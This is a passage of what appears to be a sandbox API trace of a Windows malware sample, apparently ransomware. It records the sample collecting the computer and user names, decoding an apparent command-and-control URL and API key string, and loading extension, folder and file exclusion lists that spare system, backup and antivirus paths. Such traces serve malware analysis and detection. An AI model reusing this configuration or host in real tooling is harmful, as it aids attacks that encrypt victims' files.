lpWideCharStr="4738FFCE43D68C1B0F91CFF514A09A2160DE6BEA3C736B6FC7FF80BE6F5CFF230ED977C8026F35462F6B3741ACA1AD94798869F842BA98A0BD1C9FF58FC330C91E5EC701FC163036BDC2A5243EA6EC63DAFE4D01DFA8036420682064167677234F99F8420EEE6D6741A858A537B2CE33BCEC4DA21C4CAF1525C6AF02097478E1EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 128 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f3b1ec, cbMultiByte=256, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="460F9943EA70F10389BA83827D38761C44D11556600CAE47FCE041FA7B932D63456C63CAC311F175B384AE9D742C1919243EC577E8E195AF9A6777067A97B1543956E3BCE5B21C15CBFD12E0E2D2ADCAD6C328478E48EC90879B6F7A2D16BAFE20E0EC801BD4919CBC0A8178BC48440AFA48A46621BF5BBDE8F186BA3D22A190EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 256 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=128, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="A544CC0B6871709CA6FCE3CBE3727E0ADA1EE0FD031AF9F91D25ECF2620BD89FE57D212CB3D20EA9DC23AE7CF446A3B41801512B309BAB80E6DCF0DC0F8CA8073956E3BCE5B21C15CBFD12E0E2D2ADCAD6C328478E48EC90879B6F7A2D16BAFE20E0EC801BD4919CBC0A8178BC48440AFA48A46621BF5BBDE8F186BA3D22A190EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 128 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=128, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="34F90809FA1AD10A2F825C1204CD8ED5D49E99D51631226F796967F03C14070FA433CB0B500436B38501518FDF3E4144754028D125907384DA233836043F41413956E3BCE5B21C15CBFD12E0E2D2ADCAD6C328478E48EC90879B6F7A2D16BAFE20E0EC801BD4919CBC0A8178BC48440AFA48A46621BF5BBDE8F186BA3D22A190EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 128 [0090.512] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1fb2ccc, cbMultiByte=8, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="00000000FA1AD10A2F825C1204CD8ED5D49E99D51631226F796967F03C14070FA433CB0B500436B38501518FDF3E4144754028D125907384DA233836043F41413956E3BCE5B21C15CBFD12E0E2D2ADCAD6C328478E48EC90879B6F7A2D16BAFE20E0EC801BD4919CBC0A8178BC48440AFA48A46621BF5BBDE8F186BA3D22A190EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 8 [0090.621] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: ", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0090.621] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: ", cchWideChar=8, lpMultiByteStr=0x1fb2a8c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[DONE]: ", lpUsedDefaultChar=0x0) returned 8 [0090.621] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="460F9943EA70F103", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.621] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="460F9943EA70F103", cchWideChar=16, lpMultiByteStr=0x1fc8604, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="460F9943EA70F103", lpUsedDefaultChar=0x0) returned 16 [0090.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebd4, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0090.622] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0090.622] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1fba09c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0090.622] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebd4, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0090.622] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0090.622] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1fba09c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0090.622] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x19fbf4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fbf4*=0x1a, lpOverlapped=0x0) returned 1 [0090.701] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x1f33c5c, nSize=0x8000 | out: lpDst="LHNIWSJ") returned 0x8 [0090.701] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x1f33c5c, nSize=0x8000 | out: lpDst="CIiHmnxMn6Ps") returned 0xd [0090.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb2a8c, cbMultiByte=12, lpWideCharStr=0x19eb20, cchWideChar=2047 | out: lpWideCharStr="eman_api_key旴璥\x19攰,\x190") returned 12 [0090.701] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fcf5dc, cbMultiByte=26, lpWideCharStr=0x19eb1c, cchWideChar=2047 | out: lpWideCharStr="http://eman.mygoodsday.org紶猪鸆櫁\x19搵璥攀,0") returned 26 [0090.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0df0, dwCreationFlags=0x4, lpThreadId=0x1fde1a4 | out: lpThreadId=0x1fde1a4*=0xdb0) returned 0x228 [0090.702] SetThreadPriority (hThread=0x228, nPriority=0) returned 1 [0090.702] ResumeThread (hThread=0x228) returned 0x1 [0090.702] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.702] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fba0cc, cbMultiByte=4, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="EMAN紶猪鸆櫁\x19搵璥攀,0") returned 4 [0090.702] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x4f5480 [0090.702] LoadResource (hModule=0x400000, hResInfo=0x4f5480) returned 0x5260b0 [0090.702] SizeofResource (hModule=0x400000, hResInfo=0x4f5480) returned 0x47d [0090.702] LockResource (hResData=0x5260b0) returned 0x5260b0 [0090.702] FreeResource (hResData=0x5260b0) returned 0 [0090.702] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0090.703] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0090.703] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0090.703] LockResource (hResData=0x525e94) returned 0x525e94 [0090.703] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5190, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0090.703] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5190, cbMultiByte=38, lpWideCharStr=0x1fde26c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0090.703] FreeResource (hResData=0x525e94) returned 0 [0090.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0090.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe5194, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0090.703] GetCurrentThreadId () returned 0x360 [0090.703] GetCurrentThreadId () returned 0x360 [0090.703] GetCurrentThreadId () returned 0x360 [0090.703] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f39dd8, cbMultiByte=1149, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1149 [0090.703] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f39dd8, cbMultiByte=1149, lpWideCharStr=0x1f449dc, cchWideChar=1149 | out: lpWideCharStr="[NF_START]\r\nVBS\r\nRTF\r\nBMP\r\nTMP\r\nRDP\r\nSEK\r\nICO\r\nDLL\r\nBLF\r\nRBS\r\nREGTRANS-MS\r\nSETTINGCONTENT-MS\r\nSEARCH-MS\r\nLOG\r\nXML\r\nLOG1\r\nLOG2\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\\\r\n\\WINDOWS.OLD\\\r\n\\WINDOWS10UPGRADE\\\r\n\\$RECYCLE.BIN\\\r\n\\WINDOWS NT\\\r\n\\COMMON FILES\\\r\n\\TEMP\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\ACRONIS\\\r\n\\BACKUPCLIENT\\\r\n\\BACKUP MANAGER\\\r\n\\CARBONITE\\\r\n\\INTERNET EXPLORER\\\r\n\\WINDOWSPOWERSHELL\\\r\n\\WINDOWS DEFENDER\\\r\n\\TOR BROWSER\\\r\n\\DVD MAKER\\\r\n\\ASPNET_CLIENT\\\r\n\\REFERENCE ASSEMBLIES\\\r\n\\MICROSOFT OFFICE\\\r\n\\WINDOWS SIDEBAR\\\r\n\\WINDOWS MEDIA PLAYER\\\r\n\\MICROSOFT\\OFFICE\\\r\n\\MICROSOFT ONEDRIVE\\\r\n\\GOOGLE\\DRIVE\\\r\n\\DROPBOX\\\r\n\\MICROSOFT\\PROVISIONING\\\r\n\\MICROSOFT SILVERLIGHT\\\r\n\\PROGRAMDATA\\MICROSOFT\\\r\n\\MICROSOFT\\CRYPTO\\\r\n\\WINDOWSAPPS\\\r\n\\ACROBAT READER\r\n\\NVIDIA\r\n\\7-ZIP\\\r\n\\WINRAR\\\r\n\\ESET\r\n\\AVAST\r\n\\MALWAREBYTES\r\n\\SYMANTEC ENDPOINT\r\n\\TREND MICRO\r\n\\BITDEFENDER\r\n\\PANDA SECURITY\r\n\\MCAFEE\r\n\\KASPERSKY LAB\r\n\\KASPERSKYLAB\r\n\\AVDEFENDER\r\n\\SOPHOS\r\n\\AVG\r\n[ND_END]\r\n[FEX_START]\r\nNTUSER.DAT\r\nNTUSER.POL\r\nNTUSER.DAT.LOG\r\nNTUSER.DAT.LOG1\r\nNTUSER.DAT.LOG2\r\nICONCACHE.DB\r\nTHUMBS.DB\r\nBOOTSECT.BAK\r\nBOOTMGR\r\nDEFAULT.RDP\r\nPAGEFILE.SYS\r\nHIBERFIL.SYS\r\nSWAPFILE.SYS\r\nWORDPAD.EXE\r\n[FEX_END]\r\n") returned 1149 [0090.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0090.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0090.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACRONIS\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUPCLIENT\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUP MANAGER\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CARBONITE\\", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT ONEDRIVE\\", cchCount1=20, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GOOGLE\\DRIVE\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DROPBOX\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACROBAT READER", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NVIDIA", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0090.710] 